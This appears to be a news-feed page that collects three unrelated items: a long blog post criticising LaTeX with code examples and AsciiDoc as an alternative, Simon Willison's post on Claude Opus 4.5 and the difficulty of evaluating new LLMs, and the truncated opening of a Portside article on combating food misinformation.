Let’s look at what can go wrong with these environments:

 1\documentclass{article}
 2
 3\begin{document}
 4
 5\begin{itemize}
 6    \item Foo
 7    \begin{itemize}
 8        \item Bar
 9    % Missing end!
10\end{itemize}
11
12\end{document}

While trying to compile this, pdfTeX will tell us that an error occurred:

! LaTeX Error: \begin{itemize} on input line 5 ended by \end{document}.

See the LaTeX manual or LaTeX Companion for explanation.
Type  H <return>  for immediate help.
 ...

l.12 \end{document}

Your command was ignored.
Type  I <command> <return>  to replace it with another command,
or  <return>  to continue without it.

However, if you have configured your build chain to ignore such errors (or you are using Overleaf which does so by default!) you will get a result regardless. This file will be converted into a list that looks like this:

  • Foo
    • Bar

This might not seem that bad at first. However, it becomes incredibly confusing once the error occurs in a larger document. What happens after we add another itemize environment after the first one?

 1\documentclass{article}
 2
 3\begin{document}
 4
 5\begin{itemize}
 6    \item Foo
 7    \begin{itemize}
 8        \item Bar
 9    % Missing end!
10\end{itemize}
11
12\begin{itemize}
13    \item Baz
14\end{itemize}
15
16\end{document}

What will happen now? Just from looking at the code, we might conclude that the second top-level itemize environment will start a new list. Sadly, this is not the case. While we will be presented with the same error as before, the result will look like this:

  • Foo
    • Bar
    • Baz

Very confusing and a complete nightmare if such an error went unchecked in a large document. It does not help that the error message points us to the wrong itemize environment. The problem occurs for the environment in line 7, not in line 5. A beginner might be completely left in the dark when trying to figure out what went wrong with their document.

The Problem of Ubiquity

This problem is amplified by the fact that environments are used for practically everything . They are the main control structure in LaTeX documents. We cannot get around using them and we are forced having to work around creating large nested environment monsters. Luckily, we can define aliases for these environments or even wrap them in a simple command. Here is a little example for a command that creates a slide with two independently scaled images in a Beamer presentation:

 1\newcommand{\twoimageslide}[6] {
 2  \begin{frame}{}
 3    \centering
 4    \footnotesize
 5    \begin{minipage}[b]{0.45\linewidth}
 6      \centering
 7      \includegraphics[scale=#3]{Images/#1}\\
 8      #2
 9    \end{minipage}
10    \begin{minipage}[b]{0.45\linewidth}
11      \centering
12      \includegraphics[scale=#6]{Images/#4}\\
13      #5
14    \end{minipage}
15  \end{frame}
16}

And here is how it is used:

\twoimageslide{foo.jpg}{First title}{0.4}{bar.jpg}{Second Title}{0.6}

This can make working with environments slightly simpler. However, now all the complexity of environments is hidden away and might lead to problems laters. For example, what if a code listing ( lstlisting environment) is used? It turns out you cannot just simply use that in a Beamer presentation without using fragile frames.

This leads to completely incomprehensible problems later down the line. Custom commands and environments are inherently not portable without a lot of extra work put into them. While this might be a fine tradeoff for package authors on CTAN, it is a horrible cost for an author to bare. The portability issues get even worse when looking at document specific configurations.

Taking Control over Document Style

The pervasive promise of LaTeX is that the actual content and its formatting are separated. Here is a quote from the LaTeX-Project’s about page .

LaTeX is not a word processor! Instead, LaTeX encourages authors not to worry too much about the appearance of their documents but to concentrate on getting the right content. […] LaTeX is based on the idea that it is better to leave document design to document designers, and to let authors get on with writing documents.

There are two problems with this promise:

  1. It’s broken in most documents
  2. The author often is the designer

First, let’s take a look at the first point.

Package configurations

It is not uncommon to find code like this at the start of many LaTeX documents:

 1\usepackage{hyperref}
 2\hypersetup{
 3    colorlinks=true,
 4    urlcolor=blue
 5}
 6
 7\usepackage{listings}
 8\usepackage{xcolor}
 9
10\definecolor{codegreen}{rgb}{0,0.6,0}
11\definecolor{codegray}{rgb}{0.5,0.5,0.5}
12\definecolor{codepurple}{rgb}{0.58,0,0.82}
13\definecolor{background}{rgb}{0.95,0.95,0.92}
14
15\lstdefinestyle{code}{
16    backgroundcolor=\color{background},
17    commentstyle=\color{codegreen},
18    keywordstyle=\color{magenta},
19    numberstyle=\tiny\color{codegray},
20    stringstyle=\color{codepurple},
21    ... % many options omitted for brevity
22    tabsize=2
23}
24
25\lstset{style=code}

In the first five lines, the hyperref package is included and configured to use blue as its link color. The following lines define colors and a style for code listings.

This is the first break of our promise. Setting up packages correctly is not handled externally, but in the document the author is concerned with. Of course, these configuration could be put in a special settings.tex or preamble.tex file which is included in the main TeX file, but what if the author wants to add more packages?

The main problem here is that LaTeX files combine formatting and content. It does not work like HTML and CSS, where HTML is used for the structure and CSS is used for the style of a document. While LaTeX has its own style files ( .cls and .sty ) the separation doesn’t work as well, since these files are used to determine the structure of the content beforehand. This can be read about here :

In the ideal case, a class file will completely define the structure of the document. The familiar article class is a good example: it provides commands for typesetting articles, such as \section , \tableofcontents , \author and so on.

This means that our content files are inherently linked to predefined structure, making them not portable. Turning a normal article to a book, a book to a presentation, or a presentation to an article becomes cumbersome and forces the author to think about formatting and technical details.

Depending on how your file is later used, you as the author have to make sure that certain formatting is taken care of. Sometimes, page numbers have to be explicitly disabled (using \pagestyle{empty} ) or the document is restrained to using a fixed selection of packages. This forces the author to write down content differently. For example, it makes a big difference wether listings or minted is used to support code listings and the author is forced to adhere to control structures of the used package.

In document preparation systems like AsciiDoc such features have a much more simple interface which leaves the actual formatting applied at the end to internal settings of the AsciiDoc processor; far away from the author.

Outside of professionally published books, the author fundamentally has to worry about the design of their document. In doctoral theses, academic papers and presentations the author is tasked with making sure that the document looks good and readable. Even though LaTeX is very good at keeping a document readable, it cannot work wonders. Aesthetic decisions like line height, font type or margins and paddings around inserted graphics often need work and cannot be left to the machine to figure out.

LaTeX has mostly sane defaults for all of these parameters. Thus it is very opinionated. You can ask it nicely to put a figure at a certain position in the document but without some work the typesetter is allowed to simply ignore your request. Manually overriding these decision makes the source even more unreadable and much harder to deal with.

One way of taking control over the document is overriding macros like \baselineskip or \parskip to change the general look of the document. Another method is using \vspace and \hspace to add (or even remove) space around certain elements.

The disadvantage of these methods is that the otherwise sane defaults now break down completely and the document becomes as fragile as your average WYSIWYG editor experience. Now, we are once again forced to take the imperative document style into account, carefully evaluating when certain parameter changes hold true and when they don’t. At this point the syntax of LaTeX makes it hard to figure out what is shown and the complicated logic running in the background make it almost impossible to gauge how anything will look. It is this point where the clear advantage of applications such as LibreOffice Writer, Microsoft Word or Adobe InDesign become apparent. LaTeX simply isn’t made to design anything. If you don’t like its defaults you are simply out of luck.

Beamer Presentations

Beamer presentations are ugly. They are so, so ugly. Just look at the default themes . They are pure visual clutter. Useless progress indicators at the top, redundant information at the bottom, horrendous colors, ugly skewmorphic balls for bullet points, drop shadows from the 2000s, weird interactive navigation elements, which most people deactivate anyways; all of it is awful. 2 Every fiber of my body screams in agony when I have to look at those ugly, ugly slides. Using Beamer never felt right to me. The presentations simply never looked good, no matter how hard I tried.

It seems that I am not the only one that tried. A quick look at the template collection on Overleaf shows how many institutions and authors tried to make Beamer look good. It cannot be a coincidence that most templates look like a stock template with an adjusted pallette. As was already discussed, changing the design in LaTeX documents is hard.

Tip

One of the few templates that fixes a lot of problems found with Beamer is the TU Delft presentation template . I’m sure that after removing the logo, one could make a nice looking presentation with it.

I also tried my hand at creating a better presentation from the default templates. When I was still in university I played around with a minimalist approach to presentation design, which was the only time I felt productive working with Beamer. My solution to the design problem was to restrict myself to a fixed number of slide types:

  • Single image + caption
  • Two images + captions
  • Centered title
  • Equation
  • Quote

Then I could write commands that got the design of these slide types exactly right and applied the design rules to the content. The presentation looks like this and here is the (poorly formatted 3 ) source for it:

Presentation Source
  1\documentclass[11pt]{beamer}
  2\usetheme{Boadilla}
  3\usepackage[utf8]{inputenc}
  4\usepackage{amsmath}
  5\usepackage{amsfonts}
  6\usepackage{amssymb}
  7\usepackage{varwidth}
  8\usepackage{graphicx}
  9\author{Philipp Hagenlocher}
 10\title{Fermats letzter Satz und Andrew Wiles}
 11\setbeamercovered{transparent}
 12\date{12. Januar 2019}
 13
 14%gets rid of bottom navigation symbols
 15\setbeamertemplate{navigation symbols}{}
 16%gets rid of footer
 17\setbeamertemplate{footline}{}
 18
 19\newenvironment{titleframe}
 20{
 21\begin{frame}[plain]{}
 22\LARGE
 23\centering
 24}
 25{
 26\end{frame}
 27}
 28
 29\newenvironment{citext}
 30{
 31\begin{center}
 32\begin{varwidth}{0.925\textwidth}
 33}
 34{
 35\end{varwidth}
 36\end{center}
 37}
 38
 39\newcommand{\grame}[3] {
 40\begin{frame}{}
 41\centering
 42\begin{minipage}[b]{\linewidth}
 43\centering
 44\footnotesize
 45\includegraphics[scale=#3]{Images/#1}\\
 46#2
 47\end{minipage}
 48\end{frame}
 49}
 50
 51\newcommand{\gwome}[6] {
 52\begin{frame}{}
 53\centering
 54\footnotesize
 55\begin{minipage}[b]{0.45\linewidth}
 56\centering
 57\includegraphics[scale=#3]{Images/#1}\\
 58#2
 59\end{minipage}
 60\begin{minipage}[b]{0.45\linewidth}
 61\centering
 62\includegraphics[scale=#6]{Images/#4}\\
 63#5
 64\end{minipage}
 65\end{frame}
 66}
 67
 68\newcommand{\trame}[1] {
 69\begin{titleframe}
 70#1
 71\end{titleframe}
 72}
 73
 74\newcommand{\erame}[1] {
 75\begin{titleframe}
 76\begin{equation*}
 77#1
 78\end{equation*}
 79\end{titleframe}
 80}
 81
 82\newcommand{\qrame}[1] {
 83\begin{titleframe}
 84\begin{citext}
 85#1
 86\end{citext}
 87\end{titleframe}
 88}
 89
 90\begin{document}
 91
 92\begin{frame}
 93\titlepage
 94\end{frame}
 95
 96\grame{wiles_conf.jpg}{Andrew Wiles (23. Juni 1993)}{1.2}
 97\grame{fermat.jpg}{Pierre de Fermat}{0.5}
 98\grame{diophantus.jpg}{Arithmetica von Diophantos (Edition aus 1621)}{0.34}
 99\gwome{mersenne.jpg}{Marin Mersenne}{0.3}{pascal.jpg}{Blaise Pascal}{0.7}
100\erame{n * \binom{n+m-1}{m-1} = m * \binom{n+m-1}{m}}
101\erame{S_m(N) = \displaystyle\sum_{i=1}^{N} n^m}
102\erame{a^p \equiv a \: (mod \: p)}
103\grame{diophantus.jpg}{Arithmetica von Diophantos (Edition aus 1621)}{0.34}
104\qrame{Es ist nicht möglich, einen Kubus in zwei Kuben, oder ein Biquadrat in zwei Biquadrate und allgemein eine Potenz, höher als die zweite, in zwei Potenzen mit demselben Exponenten zu zerlegen.}
105\erame{x^n + y^n = z^n}
106\erame{\forall_{n \in \{\mathbb{N} \setminus \{1,2\}\}} \not \exists_{x,y,z \in \mathbb{N}} \: . \: x^n + y^n = z^n}
107\erame{x^4 + y^4 = z^4}
108\erame{A_n \rightarrow A_m \: mit \: m<n}
109\grame{euler.png}{Leonard Euler}{0.3}
110\grame{germain.jpg}{Sophie Germain}{0.6}
111\gwome{legendre.jpg}{Adrien-Marie Legendre}{0.4}{dirichlet.jpg}{Peter Gustav Lejeune Dirichlet}{0.4}
112\grame{lame.jpg}{Gabriel Lamé}{0.3}
113\grame{academy.jpg}{Darstellung der französischen Akademie der Wissenschaften (1698)}{0.4}
114\gwome{lame.jpg}{Gabriel Lamé}{0.28}{cauchy.jpg}{Augustin-Louis Cauchy}{0.72}
115\grame{kummer.jpg}{Ernst Kummer}{0.6}
116\grame{wolfskehl.jpg}{Paul Wolfskehl}{0.533}
117\qrame{Sehr geehrte/r .........................,\\ \\ich danke Ihnen für Ihr Manuskript zum Beweis der Fermatschen Vermutung.\\Der erste Fehler findet sich auf:\\Seite .... Zeile ....\\Ihr Beweis ist daher wertlos.\\ \\Professor E. M. Landau}
118\grame{wiles_kid.jpg}{Andrew Wiles}{0.72}
119\grame{wiles_young.jpg}{Andrew Wiles bei seiner Abschlussfeier}{1}
120\erame{y^2 = x^3 + ax + b + c}
121\gwome{taniyama.png}{Yutaka Taniyama}{2}{shimura.png}{Goro Shimura}{0.31}
122\grame{frey.jpg}{Gerhard Frey}{0.6}
123\erame{y^2 = x(x-a^n)(x+b^n)}
124\grame{ribet.jpg}{Kenneth Alan "Ken" Ribet}{0.8}
125\trame{}
126\grame{wiles_port.jpg}{Andrew Wiles}{0.19}
127\trame{L-Funktionen und Arithmetik}
128\trame{Modulformen, elliptische Kurven und Galois-Darstellungen}
129\grame{wiles_conf.jpg}{Andrew Wiles (23. Juni 1993)}{1.2}
130\grame{katz.jpg}{Nicholas Michael "Nick" Katz}{0.3}
131\grame{taylor.jpg}{Richard Taylor}{0.61}
132\trame{}
133\gwome{wiles_port2.jpg}{Andrew Wiles}{0.6}{fermat.jpg}{Pierre de Fermat}{0.45}
134
135\end{document}

Would I have been faster just using copy-paste in a WYSIWYG? Maybe. However, now I have a template to use for further presentations! Too bad I don’t use Beamer anymore.

Collaboration & Efficiency

An important part of writing is collaboration. For the most part, documents are not the product of a lone author, but many people adding content, designing elements and reviewing changes. Sadly, LaTeX makes this essential part of authoring a complicated and frustrating endeavour.

“But I’m not a programmer!”

Most people without a background in computer technology look at LaTeX and think they are staring at the source code of a program. 4 LaTeX is a complex and unintuitive system and bringing in newcomers is hard work. You cannot send a .tex file to a random contributor expecting they can work with it. This is a death sentence for collaboration.

I am sure that the argument will be made that LaTeX is very frequently used in academia to collaborate on papers but that is a very poor argument. It is no wonder that a homogenous group brought up in the very academic environment that champions the usage of LaTeX, is able to collaborate using it. However, what if interdisciplinary teams need to work on the same document?

What if people outside of academia want to contribute? Especially in business settings LaTeX has no reason to exist. Nobody cares about pretty typesetting for mathematic formulas when all you need is to copy spreadsheets from one document to the other. WYSIWYG editors are far superior when speed and efficiency is important and business is all about optimizing these two measures.

Interop? What Interop?

Office suites have an important property: Interoperability. A chart created in Excel, can effortlessly be inserted into Word and automatically receive updates if the Excel file was changed. When these files live on a NFS, collaboration is made easy. Data scientists publish a CSV file of their data, a consultant links this data in Excel and creates a chart from it and a manager then links this chart into Word or PowerPoint to create presentation material. Sounds like a nice little pipeline. 5

In LaTeX such a pipeline is hard to imagine without exporting results as images. While pandas , the famous Python data analysis library, is capable of exporting data as LaTeX tables it is rare for a simple copy and paste to just work. In this context, automation means scripting. Get those awk and sed manpages out, we are going to need them when we want to automate anything using LaTeX.

Another problem is the integration of different data sources in the same document. What about diagrams made with Mermaid or PlantUML? AsciiDoctor allows to use Kroki to embed the output of a wide variety of different diagram rendering backends directly into documents. A much more complicated toolchain can be built to even allow automatic exports to services such as Confluence. 6 Such an interoperability is hard to imagine with documents written with LaTeX.

And what about spellchecking or editorial style linting? Most tools have no easy way of ignoring the numerous, custom control structures of LaTeX documents and will lead to false positivies. While platforms like Overleaf have a built-in spellchecker that seems to be syntax aware, other open-source tools like Vale have no support for LaTeX and focus more on Markdown-based syntax.

That’s why LaTeX doesn’t even come up in discussions around the documentation as code philosophy , while languages like Markdown are used with static-site generators to automatically generate online documentation. LaTeX has simply become to much of a monolithic burden as a document preparation software for it to be useful in this regard.

Slow results

In a study Knauf and Nejasmic find that Microsoft Word users (novices and experts alike) write content quicker and produce fewer formatting and content errors than their LaTeX using peers. 7 This is a pretty strong claim that has to be taken with a grain of salt. The study uses a small sample size of 40 participants and a single experiment, where the tasks are to recreate three pieces of text in either Word or LaTeX:

  • Continuous text
  • A table
  • Text with equations

While this seems like a fair and balanced task we have to raise the question wether text reproduction can be used to evaluate efficiency of document preparation systems.

Nonetheless, the results from the study are interesting. Not only did Word users outperform LaTeX users, they did so in two of three tasks. While LaTeX users performed slightly better in reproducing a text with equations, they severly underperformed in the other tasks. Word users were better at formatting a table and writing continuous text with less errors.

This result does not shock me. Not only do LaTeX users have to deal with horrible syntax, they also face the problem of bad editor support, unpredictable feature interactions and no way to quickly inspect their output and nudge it in the right direction. It is not far fetched that errors in the content (like gramatical errors) could sneak into the mess of \begin and \end that a LaTeX document quickly becomes.

An Easy Alternative

Why use LaTeX when there are alternatives? Document preparation software is a vast field and many open-source projects try to carve out a space for themselves. Let’s highlight one of them.

AsciiDoc was already named a few times in this post as an alternative to LaTeX. The language is a simple to understand Markdown flavor with special control structures for embedding images, tables, lists, listings, admonition blocks and many more. It is used to create documents in PDF, HTML, DocBook and many more formats. The AsciiDoctor processor provides a fantastic eco-system of plugins and tools. With asciidoctor-kroki we can embedd a huge variety of plain-text diagram description languages into our document using Kroki . Using asciidoctor-mathematical we can use mathematical to render mathematical equations. Editing can be achieved easily with the VSCode extension for AsciiDoctor to provide a live-preview of the structure of the document in real-time.

Let’s look at a small example highlighting a few things that AsciiDoc can do using a simple file creating a bit of text, lists and tables. Additionally, we are using Kroki as part of our local toolchain to include diagrams in our document. Compiling this is only possible in a docker setup with correctly set up networks, so this is just for demonstration. Here is the source for the document:

example.adoc
:library: Asciidoctor
:stylesdir: style
:stylesheet: stylesheet.css
:imagesdir: images
:source-highlighter: pygments
// This lets asciidoctor inline images into the HTML output
:data-uri:
:toc: left
include::misc/kroki-settings.adoc[]

= AsciiDoc Examples

== Paragraphs

**Lorem ipsum dolor sit amet**, consectetur adipiscing elit. Sed eleifend feugiat tortor, in dignissim felis blandit non. Fusce suscipit urna id neque iaculis scelerisque. Fusce convallis leo turpis, vel blandit sapien malesuada at. Vestibulum ut elit eu quam laoreet mattis pulvinar vitae libero. Cras egestas, lacus non condimentum facilisis, risus tortor lobortis velit, quis facilisis ex risus sit amet ligula. Praesent facilisis lacus eros, et dictum tortor varius sed. Nam gravida mollis mattis. Sed eros nulla, varius et posuere sed, congue non dolor. Nullam urna risus, condimentum ac tempus sed, sagittis et nunc. Ut at fermentum diam. Quisque consequat tincidunt tellus vitae consectetur.

_Curabitur vestibulum ante metus_, a vestibulum nisl efficitur iaculis. Sed id massa sed nibh suscipit consectetur sit amet et massa. Morbi ex leo, congue in nunc et, tristique euismod enim. Nunc in dolor vitae erat egestas suscipit. Nulla hendrerit et dolor et sagittis. Praesent posuere nibh ac erat bibendum, vel interdum enim imperdiet. Aliquam erat volutpat. Donec quis porttitor purus. Etiam accumsan dignissim est et porta. Fusce eget sem laoreet, suscipit nisi quis, pulvinar libero. Etiam eu rutrum velit. In tortor arcu, luctus vitae posuere sit amet, molestie in odio. Donec purus tortor, pretium ut erat non, fringilla rhoncus massa. Nam ac dapibus orci, quis convallis nisl. Phasellus quis neque et velit scelerisque maximus.

== Tables

=== Basic

|===
|Column 1, header row |Column 2, header row |Column 3, header row

|Cell in column 1, row 2
|Cell in column 2, row 2
|Cell in column 3, row 2

|Cell in column 1, row 3
|Cell in column 2, row 3
|Cell in column 3, row 3
|===

=== CSV Paste-in

[%header,format=csv]
|===
"Column 1, header row","Column 2, header row","Column 3, header row"
"Cell in column 1, row 2","Cell in column 2, row 2","Cell in column 3, row 2"
"Cell in column 1, row 3","Cell in column 2, row 3","Cell in column 3, row 3",
|===

== Lists

=== Normal

* Hello
* World!

=== Numbered

. Hello
. World!

== Code Highlighting

[source,ruby]
----
puts "Hello World!"
----

== Diagrams

=== Mermaid

[mermaid]
....
flowchart LR
    Hello --> World!
....

=== Graphviz

[graphviz]
....
digraph {
    Hello -> "World!"
}
....

=== Vega-Lite

[vegalite]
....
{
  "$schema": "https://vega.github.io/schema/vega-lite/v4.json",
  "description": "Horizontally concatenated charts that show different types of discretizing scales.",
  "data": {
    "values": [
      {"a": "A", "b": 28},
      {"a": "B", "b": 55},
      {"a": "C", "b": 43},
      {"a": "D", "b": 91},
      {"a": "E", "b": 81},
      {"a": "F", "b": 53},
      {"a": "G", "b": 19},
      {"a": "H", "b": 87},
      {"a": "I", "b": 52}
    ]
  },
  "hconcat": [
    {
      "mark": "circle",
      "encoding": {
        "y": {
          "field": "b",
          "type": "nominal",
          "sort": null,
          "axis": {
            "ticks": false,
            "domain": false,
            "title": null
          }
        },
        "size": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantize"
          }
        },
        "color": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantize",
            "zero": true
          },
          "legend": {
            "title": "Quantize"
          }
        }
      }
    },
    {
      "mark": "circle",
      "encoding": {
        "y": {
          "field": "b",
          "type": "nominal",
          "sort": null,
          "axis": {
            "ticks": false,
            "domain": false,
            "title": null
          }
        },
        "size": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantile",
            "range": [80, 160, 240, 320, 400]
          }
        },
        "color": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "quantile",
            "scheme": "magma"
          },
          "legend": {
            "format": "d",
            "title": "Quantile"
          }
        }
      }
    },
    {
      "mark": "circle",
      "encoding": {
        "y": {
          "field": "b",
          "type": "nominal",
          "sort": null,
          "axis": {
            "ticks": false,
            "domain": false,
            "title": null
          }
        },
        "size": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "threshold",
            "domain": [30, 70],
            "range": [80, 200, 320]
          }
        },
        "color": {
          "field": "b",
          "type": "quantitative",
          "scale": {
            "type": "threshold",
            "domain": [30, 70],
            "scheme": "viridis"
          },
          "legend": {
            "title": "Threshold"
          }
        }
      }
    }
  ],
  "resolve": {
    "scale": {
      "color": "independent",
      "size": "independent"
    }
  }
}
....

=== Structurizr

[structurizr]
....
 workspace {
    model {
        user = person "User"
        softwareSystem = softwareSystem "Software System" {
            webapp = container "Web Application" {
                user -> this "Uses!!!"
            }
            database = container "Database" {
                webapp -> this "Reads from and writes to"
            }
        }
    }
    views {
        systemContext softwareSystem {
            include *
            autolayout lr
        }
        container softwareSystem {
            include *
            autolayout lr
        }
        theme default
    }
}
....

This file includes a helper file to set a few settings for the imported Kroki images.

kroki-settings.adoc
:kroki-fetch-diagram: true
:kroki-default-options: inline
:kroki-default-format: svg
ifdef::backend-pdf[]
// For the PDF backend, using SVG doesn't work with mermaid diagrams
:kroki-default-format: png
endif::[]
// Port to a local docker container running Kroki
:kroki-server-url: http://kroki:8000

This can then be compiled to a asciidoc.html or asciidoc.pdf file. Note that the source includes almost no extraneous syntax that is concerned with document structure or anything but the content. Data from CSV files can be included in AsciiDoc without much hassle and interoperability with multiple diagram backends is demonstrated.

What AsciiDoc shows in simplicity is also its weakest point. It doesn’t leave too many possibilities for formatting or changing the overall structure of the document. While the format shown in this example is fine for many documents, AsciiDoc lacks in a simple way of taking control over the overall design in a meaningful way, even though it can be done . However, one might argue that AsciiDoc precisely keeps LaTeX’ promise that the author ultimately does not have to worry about formatting. It is therefore very popular for technical documentation.

Another serious alternative to LaTeX, especially when it comes to scientific texts, seems to be Typst . I can’t make any real statements about it since I haven’t used it yet. However, its syntax, features and results already look quite nice.

Why LaTeX?

With all the cynical critique aside: What are the features that make people vouch for LaTeX? Looking around online, you will find a large community that simply loves how documents created with it look . The typesetting has become the main argument for defending its use. Is that really LaTeX’ only strong suite?

Typographic Beauty Craze

LaTeX produces some very good looking text. Yep. Don’t believe me? Look at this comparison of Word, InDesign and LaTeX by Roel Zinkstok. Kerning? Ligatures? Proper spacing for easier readability? It’s all there.

But that is expected from a typesetting system isn’t it? The whole point of TeX was to create some beautifully rendered text and at its core, thats what LaTeX can offer. Additionally, LaTeX brings beauty to mathematical typesetting! With its handsomely rendered mathematical formulas, LaTeX has inspired libraries such as MathJax and KaTeX to also provide this typesetting capability in modern webbrowsers.

This quality is an obvious plus when writing professional documents or publishing a book. LaTeX gives self-published authors the ability to provide output that (typographically) matches what professional publishers can achieve. After all, publishers love LaTeX too!

A Publisher’s Tool

The primary idea behind TeX was for it to be used for book publishing. It’s no wonder that many publishers use it. With the help of packages such as memoir it becomes manageable to take full control over typesetting and many other aspects of a document. This kind of deep and precise control cannot be offered by Word nor AsciiDoctor.

LaTeX’ support for cross-references, glossaries, bibliographies, lists of figures and automatic generation of a larger documents structure make it an essential tool for writing scientific books or theses. These features rightfully make it very popular in academic circles for writing papers.

Familiar in Academic Circles

LaTeX is a product of academia. Mathematicians, phycisists and computer scientists rejoice over their favorite document creation software. Therefore it is no wonder that LaTeX is their first choice when collaborating on papers. In the afforementioned disciplines it essentially is the only choice. Back when I went to university, we had no choice but to use LaTeX to write essays and seminar papers, since it was a formal requirement to use specific LaTeX templates.

This implicit familiarity helps in collaboration. Packages developed for LaTeX to provide certain (niche) features that a researcher might need for their paper can be picked up and used by other researchers. The de-facto standard in these fields also helps to standardize the writing and publishing process for academic work.

Conclusion

LaTeX is patchwork. At its core is TeX, a typesetting monolith. Around this core are macros that attempt to patch functionality into a system that fundamentally isn’t designed for it. This leads to a complicated system with strange syntax, fickle interactions and possible problems that nobody wants to deal with.

Authors should not have to care about document formatting and design and LaTeX makes the promise that this isn’t the case. This promise is broken. The author not only has to worry about formatting, they also have to deal with technical details and LaTeX’ intricacies. LaTeX simply isn’t a tool for the author but for the typesetter and publisher.

If the author needs full control over the document’s design, LaTeX is the wrong choice unless they want to spend an enourmous amount of time. It also isn’t the right choice when collaboration and simple interoperability is important. LaTeX forces the author to fully commit to its complex system, wether they like it or not.

So is LaTeX just useless for the author? Absolutely not. In certain scientific fields LaTeX is the de-facto standard and mathematical typesetting rarely looks as good as it does in documents created with it. It sometimes is the only choice depending on the need.

But what if we don’t have these peculiar needs? Sensible usage of LaTeX might consists of using it as a backend. Tools like Sphinx use reStructuredText as an input language which can then be transpiled to LaTeX to generate documents using better typesetting. Using this approach the author gets the best of both worlds. Simple, understandable syntax and TeX’ formatting power.

LaTeX is also not the only document preparation system and it is far from being the standard . It’s good to look at alternatives like AsciiDoc or Typst in order to get a better feel for what kind of tools are out there that might fit your needs much better. LaTeX is best at some things but its design comes from a time that is long gone. Modern times have arrived and with modern times come modern tools. What a time to be alive!

Claude Opus 4.5, and why evaluating new LLMs is increasingly difficult

Simon Willison
simonwillison.net
2025-11-24 19:37:07
Anthropic released Claude Opus 4.5 this morning, which they call "best model in the world for coding, agents, and computer use". This is their attempt to retake the crown for best coding model after significant challenges from OpenAI's GPT-5.1-Codex-Max and Google's Gemini 3, both released within th...
Original Article

24th November 2025

Anthropic released Claude Opus 4.5 this morning, which they call “best model in the world for coding, agents, and computer use”. This is their attempt to retake the crown for best coding model after significant challenges from OpenAI’s GPT-5.1-Codex-Max and Google’s Gemini 3 , both released within the past week!

The core characteristics of Opus 4.5 are a 200,000 token context (same as Sonnet), 64,000 token output limit (also the same as Sonnet), and a March 2025 “reliable knowledge cutoff” (Sonnet 4.5 is January, Haiku 4.5 is February).

The pricing is a big relief: $5/million for input and $25/million for output. This is a lot cheaper than the previous Opus at $15/$75 and keeps it a little more competitive with the GPT-5.1 family ($1.25/$10) and Gemini 3 Pro ($2/$12, or $4/$18 for >200,000 tokens). For comparison, Sonnet 4.5 is $3/$15 and Haiku 4.5 is $4/$20.

The Key improvements in Opus 4.5 over Opus 4.1 document has a few more interesting details:

I had access to a preview of Anthropic’s new model over the weekend. I spent a bunch of time with it in Claude Code, resulting in a new alpha release of sqlite-utils that included several large-scale refactorings—Opus 4.5 was responsible for most of the work across 20 commits, 39 files changed, 2,022 additions and 1,173 deletions in a two day period.

It’s clearly an excellent new model, but I did run into a catch. My preview expired at 8pm on Sunday when I still had a few remaining issues in the milestone for the alpha . I switched back to Claude Sonnet 4.5 and... kept on working at the same pace I’d been achieving with the new model.

With hindsight, production coding like this is a less effective way of evaluating the strengths of a new model than I had expected.

I’m not saying the new model isn’t an improvement on Sonnet 4.5—but I can’t say with confidence that the challenges I posed it were able to identify a meaningful difference in capabilities between the two.

This represents a growing problem for me. My favorite moments in AI are when a new model gives me the ability to do something that simply wasn’t possible before. In the past these have felt a lot more obvious, but today it’s often very difficult to find concrete examples that differentiate the new generation of models from their predecessors.

Google’s Nano Banana Pro image generation model was notable in that its ability to render usable infographics really does represent a task at which previous models had been laughably incapable.

The frontier LLMs are a lot harder to differentiate between. Benchmarks like bench Verified show models beating each other by single digit percentage point margins, but what does that actually equate to in real-world problems that I need to solve on a daily basis?

And honestly, this is mainly on me. I’ve fallen behind on maintaining my own collection of tasks that are just beyond the capabilities of the frontier models. I used to have a whole bunch if these but they’ve fallen one-by-one and now I’m embarrassingly lacking in suitable challenges to help evaluate new models.

I frequently advise people to stash away tasks that models fail at in their notes so they can try them against newer models later on—a tip I picked up from Ethan Mollick. I need to double-down on that advice myself!

I’d love to see AI labs like Anthropic help address this challenge directly. I’d like to see new model releases accompanied by concrete examples of tasks they can solve that the previous generation of models from the same provider were unable to handle.

“Here’s an example prompt which failed on Sonnet 4.5 but succeeds on Opus 4.5” would excite me a lot more than some single digit percent improvement on a benchmark with a name like MMLU or GPQA Diamond.

In the meantime, I’m just gonna have to keep on getting them to draw pelicans riding bicycles . Here’s Opus 4.5 (on its default “high” effort level ):

The pelican is cute and looks pretty good. The bicycle is not great - the frame is wrong and the pelican is facing backwards when the handlebars appear to be forwards.There is also something that looks a bit like an egg on the handlebars.

It did significantly better on the new more detailed prompt :

The pelican has feathers and a red pouch - a close enough version of breeding plumage. The bicycle is a much better shape.

Fighting Food Misinformation

Portside
portside.org
2025-11-24 19:31:47
Fighting Food Misinformation jeannette Mon, 11/24/2025 - 14:31 ...
Original Article

From left: Mary Ellen Kuhn, Charlie Arnot, and Veronica Jaramillo | Food technology

To successfully combat science denial and misinformation in the age of social media and online influencers, food scientists need to connect on an emotional level and find shared values before attempting to pepper people with facts, said panelists during a Hot Topics Studio session on Wednesday at IFT FIRST.

“You can’t just talk louder and harder, and offer more facts. You can do that, but that’s not strategic,” said Charlie Arnot, founder and CEO of both The Center for Food Integrity and the Look East strategic communications firm, during the session titled “Myth Busting Misinformation: How to Combat Science Denial,” moderated by Mary Ellen Kuhn, executive editor at Food Technology magazine. “You can embrace and validate someone’s concerns without validating their misinformation. That gives you permission to engage as a trusted, credible authority that they will then interpret as being relevant and valuable to them.”

As fewer people get their news from traditional sources and more turn to online and social media outlets—especially true among younger generations—everyone ends up in an echo chamber of their own preexisting beliefs, said Veronica Jaramillo, cofounder of The Food Truth Project and a food science graduate student at McGill University.

“The algorithm is working a little too well for our own good,” she said. “You’re teaching the algorithm to bring on this information that you’re already believing. It’s very rare that you find something in your feed that’s contrary to your own beliefs.” And when people do, they often greet that information with skepticism or outright hostility, she added.

